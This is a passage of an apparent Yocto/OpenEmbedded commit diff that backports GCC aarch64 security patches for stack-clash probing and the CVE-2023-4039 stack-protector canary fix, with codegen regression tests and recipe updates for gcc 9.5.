867+ __uint128_t x = 0;
868+ int y[0x400];
869+ if (z)
870+ {
871+ f(0, 0, 0, 0, 0, 0, 0, &y,
872+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
873+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
874+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
875+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
876+ x);
877+ }
878+ g();
879+ return 1;
880+}
881--
8822.34.1
883
884
885From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
886From: Richard Sandiford <richard.sandiford@arm.com>
887Date: Tue, 27 Jun 2023 15:12:55 +0100
888Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
889
890-fstack-clash-protection uses the save of LR as a probe for the next
891allocation. The next allocation could be:
892
893* another part of the static frame, e.g. when allocating SVE save slots
894 or outgoing arguments
895
896* an alloca in the same function
897
898* an allocation made by a callee function
899
900However, when -fomit-frame-pointer is used, the LR save slot is placed
901above the other GPR save slots. It could therefore be up to 80 bytes
902above the base of the GPR save area (which is also the hard fp address).
903
904aarch64_allocate_and_probe_stack_space took this into account when
905deciding how much subsequent space could be allocated without needing
906a probe. However, it interacted badly with:
907
908 /* If doing a small final adjustment, we always probe at offset 0.
909 This is done to avoid issues when LR is not at position 0 or when
910 the final adjustment is smaller than the probing offset. */
911 else if (final_adjustment_p && rounded_size == 0)
912 residual_probe_offset = 0;
913
914which forces any allocation that is smaller than the guard page size
915to be probed at offset 0 rather than the usual offset 1024. It was
916therefore possible to construct cases in which we had:
917
918* a probe using LR at SP + 80 bytes (or some other value >= 16)
919* an allocation of the guard page size - 16 bytes
920* a probe at SP + 0
921
922which allocates guard page size + 64 consecutive unprobed bytes.
923
924This patch requires the LR probe to be in the first 16 bytes of the
925save area when stack clash protection is active. Doing it
926unconditionally would cause code-quality regressions.
927
928gcc/
929 * config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
930 the LR save slot is in the first 16 bytes of the register save area.
931 (aarch64_allocate_and_probe_stack_space): Remove workaround for
932 when LR was not in the first 16 bytes.
933
934gcc/testsuite/
935 * gcc.target/aarch64/stack-check-prologue-18.c: New test.
936---
937 gcc/config/aarch64/aarch64.c | 50 +++++----
938 .../aarch64/stack-check-prologue-18.c | 100 ++++++++++++++++++
939 2 files changed, 127 insertions(+), 23 deletions(-)
940 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
941
942diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
943index 4c9e11cd7cf..1e8467fdd03 100644
944--- a/gcc/config/aarch64/aarch64.c
945+++ b/gcc/config/aarch64/aarch64.c
946@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
947
948 cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
949
950+#define ALLOCATE_GPR_SLOT(REGNO) \
951+ do \
952+ { \
953+ cfun->machine->frame.reg_offset[REGNO] = offset; \
954+ if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM) \
955+ cfun->machine->frame.wb_candidate1 = (REGNO); \
956+ else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM) \
957+ cfun->machine->frame.wb_candidate2 = (REGNO); \
958+ offset += UNITS_PER_WORD; \
959+ } \
960+ while (0)
961+
962 if (cfun->machine->frame.emit_frame_chain)
963 {
964 /* FP and LR are placed in the linkage record. */
965- cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
966- cfun->machine->frame.wb_candidate1 = R29_REGNUM;
967- cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
968- cfun->machine->frame.wb_candidate2 = R30_REGNUM;
969- offset = 2 * UNITS_PER_WORD;
970+ ALLOCATE_GPR_SLOT (R29_REGNUM);
971+ ALLOCATE_GPR_SLOT (R30_REGNUM);
972 }
973+ else if (flag_stack_clash_protection
974+ && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
975+ /* Put the LR save slot first, since it makes a good choice of probe
976+ for stack clash purposes. The idea is that the link register usually
977+ has to be saved before a call anyway, and so we lose little by
978+ stopping it from being individually shrink-wrapped. */
979+ ALLOCATE_GPR_SLOT (R30_REGNUM);
980
981 /* With stack-clash, LR must be saved in non-leaf functions. */
982 gcc_assert (crtl->is_leaf
983@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
984 /* Now assign stack slots for them. */
985 for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
986 if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
987- {
988- cfun->machine->frame.reg_offset[regno] = offset;
989- if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
990- cfun->machine->frame.wb_candidate1 = regno;
991- else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
992- cfun->machine->frame.wb_candidate2 = regno;
993- offset += UNITS_PER_WORD;
994- }
995+ ALLOCATE_GPR_SLOT (regno);
996+
997+#undef ALLOCATE_GPR_SLOT
998
999 HOST_WIDE_INT max_int_offset = offset;
1000 offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
1001@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1002 HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
1003 HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
1004 gcc_assert (multiple_p (poly_size, byte_sp_alignment));
1005- /* When doing the final adjustment for the outgoing argument size we can't
1006- assume that LR was saved at position 0. So subtract it's offset from the
1007- ABI safe buffer so that we don't accidentally allow an adjustment that
1008- would result in an allocation larger than the ABI buffer without
1009- probing. */
1010 HOST_WIDE_INT min_probe_threshold
1011 = final_adjustment_p
1012- ? (guard_used_by_caller
1013- + byte_sp_alignment
1014- - cfun->machine->frame.reg_offset[LR_REGNUM])
1015+ ? guard_used_by_caller + byte_sp_alignment
1016 : guard_size - guard_used_by_caller;
1017
1018 poly_int64 frame_size = cfun->machine->frame.frame_size;
1019@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1020 if (final_adjustment_p && rounded_size != 0)
1021 min_probe_threshold = 0;
1022 /* If doing a small final adjustment, we always probe at offset 0.
1023- This is done to avoid issues when LR is not at position 0 or when
1024- the final adjustment is smaller than the probing offset. */
1025+ This is done to avoid issues when the final adjustment is smaller
1026+ than the probing offset. */
1027 else if (final_adjustment_p && rounded_size == 0)
1028 residual_probe_offset = 0;
1029
1030diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1031new file mode 100644
1032index 00000000000..82447d20fff
1033--- /dev/null
1034+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1035@@ -0,0 +1,100 @@
1036+/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
1037+/* { dg-final { check-function-bodies "**" "" } } */
1038+
1039+void f(int, ...);
1040+void g();
1041+
1042+/*
1043+** test1:
1044+** ...
1045+** str x30, \[sp\]
1046+** sub sp, sp, #4064
1047+** str xzr, \[sp\]
1048+** cbnz w0, .*
1049+** bl g
1050+** ...
1051+** str x26, \[sp, #?4128\]
1052+** ...
1053+*/
1054+int test1(int z) {
1055+ __uint128_t x = 0;
1056+ int y[0x400];
1057+ if (z)
1058+ {
1059+ asm volatile ("" :::
1060+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1061+ f(0, 0, 0, 0, 0, 0, 0, &y,
1062+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1063+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1064+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1065+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1066+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1067+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1068+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1069+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1070+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1071+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1072+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1073+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1074+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1075+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1076+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1077+ x, x, x, x, x, x, x, x, x, x, x, x, x, x);
1078+ }
1079+ g();
1080+ return 1;
1081+}
1082+
1083+/*
1084+** test2:
1085+** ...
1086+** str x30, \[sp\]
1087+** sub sp, sp, #1040
1088+** str xzr, \[sp\]
1089+** cbnz w0, .*
1090+** bl g
1091+** ...
1092+*/
1093+int test2(int z) {
1094+ __uint128_t x = 0;
1095+ int y[0x400];
1096+ if (z)
1097+ {
1098+ asm volatile ("" :::
1099+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1100+ f(0, 0, 0, 0, 0, 0, 0, &y,
1101+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1102+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1103+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1104+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1105+ x);
1106+ }
1107+ g();
1108+ return 1;
1109+}
1110+
1111+/*
1112+** test3:
1113+** ...
1114+** str x30, \[sp\]
1115+** sub sp, sp, #1024
1116+** cbnz w0, .*
1117+** bl g
1118+** ...
1119+*/
1120+int test3(int z) {
1121+ __uint128_t x = 0;
1122+ int y[0x400];
1123+ if (z)
1124+ {
1125+ asm volatile ("" :::
1126+ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
1127+ f(0, 0, 0, 0, 0, 0, 0, &y,
1128+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1129+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1130+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
1131+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
1132+ }
1133+ g();
1134+ return 1;
1135+}
1136--
11372.34.1
1138
1139
1140From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
1141From: Richard Sandiford <richard.sandiford@arm.com>
1142Date: Tue, 8 Aug 2023 01:57:26 +0100
1143Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
1144
1145Previous patches ensured that the final frame allocation only needs
1146a probe when the size is strictly greater than 1KiB. It's therefore
1147safe to use the normal 1024 probe offset in all cases.
1148
1149The main motivation for doing this is to simplify the code and
1150remove the number of special cases.
1151
1152gcc/
1153 * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
1154 Always probe the residual allocation at offset 1024, asserting
1155 that that is in range.
1156
1157gcc/testsuite/
1158 * gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
1159 to be at offset 1024 rather than offset 0.
1160 * gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
1161---
1162 gcc/config/aarch64/aarch64.c | 12 ++++--------
1163 .../gcc.target/aarch64/stack-check-prologue-17.c | 2 +-
1164 .../gcc.target/aarch64/stack-check-prologue-18.c | 7 +++++--
1165 3 files changed, 10 insertions(+), 11 deletions(-)
1166
1167diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
1168index 1e8467fdd03..705f719a2ea 100644
1169--- a/gcc/config/aarch64/aarch64.c
1170+++ b/gcc/config/aarch64/aarch64.c
1171@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1172 are still safe. */
1173 if (residual)
1174 {
1175- HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
1176+ gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
1177+
1178 /* If we're doing final adjustments, and we've done any full page
1179 allocations then any residual needs to be probed. */
1180 if (final_adjustment_p && rounded_size != 0)
1181 min_probe_threshold = 0;
1182- /* If doing a small final adjustment, we always probe at offset 0.
1183- This is done to avoid issues when the final adjustment is smaller
1184- than the probing offset. */
1185- else if (final_adjustment_p && rounded_size == 0)
1186- residual_probe_offset = 0;
1187
1188 aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
1189 if (residual >= min_probe_threshold)
1190@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1191 HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
1192 "\n", residual);
1193
1194- emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
1195- residual_probe_offset));
1196+ emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
1197+ guard_used_by_caller));
1198 emit_insn (gen_blockage ());
1199 }
1200 }
1201diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1202index 0d8a25d73a2..f0ec1389771 100644
1203--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1204+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
1205@@ -33,7 +33,7 @@ int test1(int z) {
1206 ** ...
1207 ** str x30, \[sp\]
1208 ** sub sp, sp, #1040
1209-** str xzr, \[sp\]
1210+** str xzr, \[sp, #?1024\]
1211 ** cbnz w0, .*
1212 ** bl g
1213 ** ...
1214diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1215index 82447d20fff..71d33ba34e9 100644
1216--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1217+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1218@@ -8,8 +8,9 @@ void g();
1219 ** test1:
1220 ** ...
1221 ** str x30, \[sp\]
1222+** ...
1223 ** sub sp, sp, #4064
1224-** str xzr, \[sp\]
1225+** str xzr, \[sp, #?1024\]
1226 ** cbnz w0, .*
1227 ** bl g
1228 ** ...
1229@@ -49,8 +50,9 @@ int test1(int z) {
1230 ** test2:
1231 ** ...
1232 ** str x30, \[sp\]
1233+** ...
1234 ** sub sp, sp, #1040
1235-** str xzr, \[sp\]
1236+** str xzr, \[sp, #?1024\]
1237 ** cbnz w0, .*
1238 ** bl g
1239 ** ...
1240@@ -77,6 +79,7 @@ int test2(int z) {
1241 ** test3:
1242 ** ...
1243 ** str x30, \[sp\]
1244+** ...
1245 ** sub sp, sp, #1024
1246 ** cbnz w0, .*
1247 ** bl g
1248--
12492.34.1
1250
1251
1252From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
1253From: Richard Sandiford <richard.sandiford@arm.com>
1254Date: Thu, 15 Jun 2023 19:16:52 +0100
1255Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
1256 registers
1257
1258AArch64 normally puts the saved registers near the bottom of the frame,
1259immediately above any dynamic allocations. But this means that a
1260stack-smash attack on those dynamic allocations could overwrite the
1261saved registers without needing to reach as far as the stack smash
1262canary.
1263
1264The same thing could also happen for variable-sized arguments that are
1265passed by value, since those are allocated before a call and popped on
1266return.
1267
1268This patch avoids that by putting the locals (and thus the canary) below
1269the saved registers when stack smash protection is active.
1270
1271The patch fixes CVE-2023-4039.
1272
1273gcc/
1274 * config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
1275 New function.
1276 (aarch64_layout_frame): Use it to decide whether locals should
1277 go above or below the saved registers.
1278 (aarch64_expand_prologue): Update stack layout comment.
1279 Emit a stack tie after the final adjustment.
1280
1281gcc/testsuite/
1282 * gcc.target/aarch64/stack-protector-8.c: New test.
1283 * gcc.target/aarch64/stack-protector-9.c: Likewise.
1284---
1285 gcc/config/aarch64/aarch64.c | 46 +++++++++++++--
1286 .../gcc.target/aarch64/stack-protector-8.c | 58 +++++++++++++++++++
1287 .../gcc.target/aarch64/stack-protector-9.c | 33 +++++++++++
1288 3 files changed, 133 insertions(+), 4 deletions(-)
1289 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1290 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1291
1292diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
1293index 705f719a2ea..3d094214fac 100644
1294--- a/gcc/config/aarch64/aarch64.c
1295+++ b/gcc/config/aarch64/aarch64.c
1296@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
1297 return aarch64_use_frame_pointer;
1298 }
1299
1300+/* Return true if the current function should save registers above
1301+ the locals area, rather than below it. */
1302+
1303+static bool
1304+aarch64_save_regs_above_locals_p ()
1305+{
1306+ /* When using stack smash protection, make sure that the canary slot
1307+ comes between the locals and the saved registers. Otherwise,
1308+ it would be possible for a carefully sized smash attack to change
1309+ the saved registers (particularly LR and FP) without reaching the
1310+ canary. */
1311+ return crtl->stack_protect_guard;
1312+}
1313+
1314 /* Mark the registers that need to be saved by the callee and calculate
1315 the size of the callee-saved registers area and frame record (both FP
1316 and LR may be omitted). */
1317@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
1318
1319 cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
1320
1321+ bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
1322+
1323+ if (regs_at_top_p)
1324+ {
1325+ cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
1326+ cfun->machine->frame.bytes_below_hard_fp
1327+ = aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
1328+ STACK_BOUNDARY / BITS_PER_UNIT);
1329+ }
1330+
1331 #define ALLOCATE_GPR_SLOT(REGNO) \
1332 do \
1333 { \
1334@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
1335 HOST_WIDE_INT varargs_and_saved_regs_size
1336 = offset + cfun->machine->frame.saved_varargs_size;
1337
1338+ cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
1339+ if (!regs_at_top_p)
1340+ cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
1341 cfun->machine->frame.bytes_above_hard_fp
1342- = aligned_upper_bound (varargs_and_saved_regs_size
1343- + get_frame_size (),
1344+ = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
1345 STACK_BOUNDARY / BITS_PER_UNIT);
1346
1347 /* Both these values are already aligned. */
1348@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
1349
1350 cfun->machine->frame.bytes_above_locals
1351 = cfun->machine->frame.saved_varargs_size;
1352+ if (regs_at_top_p)
1353+ cfun->machine->frame.bytes_above_locals
1354+ += cfun->machine->frame.saved_regs_size;
1355
1356 cfun->machine->frame.initial_adjust = 0;
1357 cfun->machine->frame.final_adjust = 0;
1358@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1359 | for register varargs |
1360 | |
1361 +-------------------------------+
1362- | local variables | <-- frame_pointer_rtx
1363+ | local variables (1) | <-- frame_pointer_rtx
1364 | |
1365 +-------------------------------+
1366- | padding | \
1367+ | padding (1) | \
1368 +-------------------------------+ |
1369 | callee-saved registers | | frame.saved_regs_size
1370 +-------------------------------+ |
1371@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1372 +-------------------------------+ |
1373 | FP' | / <- hard_frame_pointer_rtx (aligned)
1374 +-------------------------------+
1375+ | local variables (2) |
1376+ +-------------------------------+
1377+ | padding (2) |
1378+ +-------------------------------+
1379 | dynamic allocation |
1380 +-------------------------------+
1381 | padding |
1382@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
1383 +-------------------------------+
1384 | | <-- stack_pointer_rtx (aligned)
1385
1386+ The regions marked (1) and (2) are mutually exclusive. (2) is used
1387+ when aarch64_save_regs_above_locals_p is true.
1388+
1389 Dynamic stack allocations via alloca() decrease stack_pointer_rtx
1390 but leave frame_pointer_rtx and hard_frame_pointer_rtx
1391 unchanged.
1392@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
1393 that is assumed by the called. */
1394 aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
1395 !frame_pointer_needed, true);
1396+ if (emit_frame_chain && maybe_ne (final_adjust, 0))
1397+ emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
1398 }
1399
1400 /* Return TRUE if we can use a simple_return insn.
1401diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1402new file mode 100644
1403index 00000000000..c5e7deef6c1
1404--- /dev/null
1405+++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
1406@@ -0,0 +1,58 @@
1407+/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
1408+/* { dg-final { check-function-bodies "**" "" } } */
1409+
1410+void g(void *);
1411+
1412+/*
1413+** test1:
1414+** sub sp, sp, #288
1415+** stp x29, x30, \[sp, #?272\]
1416+** add x29, sp, #?272
1417+** mrs (x[0-9]+), tpidr2_el0
1418+** ldr (x[0-9]+), \[\1, #?16\]
1419+** str \2, \[sp, #?264\]
1420+** mov \2, *0
1421+** add x0, sp, #?8
1422+** bl g
1423+** ...
1424+** mrs .*
1425+** ...
1426+** bne .*
1427+** ...
1428+** ldp x29, x30, \[sp, #?272\]
1429+** add sp, sp, #?288
1430+** ret
1431+** bl __stack_chk_fail
1432+*/
1433+int test1() {
1434+ int y[0x40];
1435+ g(y);
1436+ return 1;
1437+}
1438+
1439+/*
1440+** test2:
1441+** stp x29, x30, \[sp, #?-16\]!
1442+** mov x29, sp
1443+** sub sp, sp, #1040
1444+** mrs (x[0-9]+), tpidr2_el0
1445+** ldr (x[0-9]+), \[\1, #?16\]
1446+** str \2, \[sp, #?1032\]
1447+** mov \2, *0
1448+** add x0, sp, #?8
1449+** bl g
1450+** ...
1451+** mrs .*
1452+** ...
1453+** bne .*
1454+** ...
1455+** add sp, sp, #?1040
1456+** ldp x29, x30, \[sp\], #?16
1457+** ret
1458+** bl __stack_chk_fail
1459+*/
1460+int test2() {
1461+ int y[0x100];
1462+ g(y);
1463+ return 1;
1464+}
1465diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1466new file mode 100644
1467index 00000000000..58f322aa480
1468--- /dev/null
1469+++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
1470@@ -0,0 +1,33 @@
1471+/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
1472+/* { dg-final { check-function-bodies "**" "" } } */
1473+
1474+/*
1475+** main:
1476+** ...
1477+** stp x29, x30, \[sp, #?-[0-9]+\]!
1478+** ...
1479+** sub sp, sp, #[0-9]+
1480+** ...
1481+** str x[0-9]+, \[x29, #?-8\]
1482+** ...
1483+*/
1484+int f(const char *);
1485+void g(void *);
1486+int main(int argc, char* argv[])
1487+{
1488+ int a;
1489+ int b;
1490+ char c[2+f(argv[1])];
1491+ int d[0x100];
1492+ char y;
1493+
1494+ y=42; a=4; b=10;
1495+ c[0] = 'h'; c[1] = '\0';
1496+
1497+ c[f(argv[2])] = '\0';
1498+
1499+ __builtin_printf("%d %d\n%s\n", a, b, c);
1500+ g(d);
1501+
1502+ return 0;
1503+}
1504--
15052.34.1
1506
diff --git a/meta/recipes-devtools/gcc/gcc-common.inc b/meta/recipes-devtools/gcc/gcc-common.inc
index 3dcfdf835f..69a3536965 100644
--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
1SUMMARY = "GNU cc and gcc C compilers" 1SUMMARY = "GNU cc and gcc C compilers"
2HOMEPAGE = "http://www.gnu.org/software/gcc/" 2HOMEPAGE = "http://www.gnu.org/software/gcc/"
3DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
3SECTION = "devel" 4SECTION = "devel"
4LICENSE = "GPL" 5LICENSE = "GPL"
5 6
@@ -99,7 +100,7 @@ BINV = "${PV}"
99#S = "${WORKDIR}/gcc-${PV}" 100#S = "${WORKDIR}/gcc-${PV}"
100S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}" 101S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
101 102
102B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}" 103B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
103 104
104target_includedir ?= "${includedir}" 105target_includedir ?= "${includedir}"
105target_libdir ?= "${libdir}" 106target_libdir ?= "${libdir}"
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-shared-source.inc b/meta/recipes-devtools/gcc/gcc-shared-source.inc
index aac4b49313..4baf7874d2 100644
--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
9 9
10do_configure[depends] += "gcc-source-${PV}:do_preconfigure" 10do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
11do_populate_lic[depends] += "gcc-source-${PV}:do_unpack" 11do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
12
13# patch is available via gcc-source recipe
14CVE_CHECK_WHITELIST += "CVE-2023-4039"
diff --git a/meta/recipes-devtools/gcc/gcc-source.inc b/meta/recipes-devtools/gcc/gcc-source.inc
index 03bab97815..224b7778ef 100644
--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
18DEPENDS = "" 18DEPENDS = ""
19PACKAGES = "" 19PACKAGES = ""
20 20
21B = "${WORKDIR}/build"
21 22
22# This needs to be Python to avoid lots of shell variables becoming dependencies. 23# This needs to be Python to avoid lots of shell variables becoming dependencies.
23python do_preconfigure () { 24python do_preconfigure () {
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
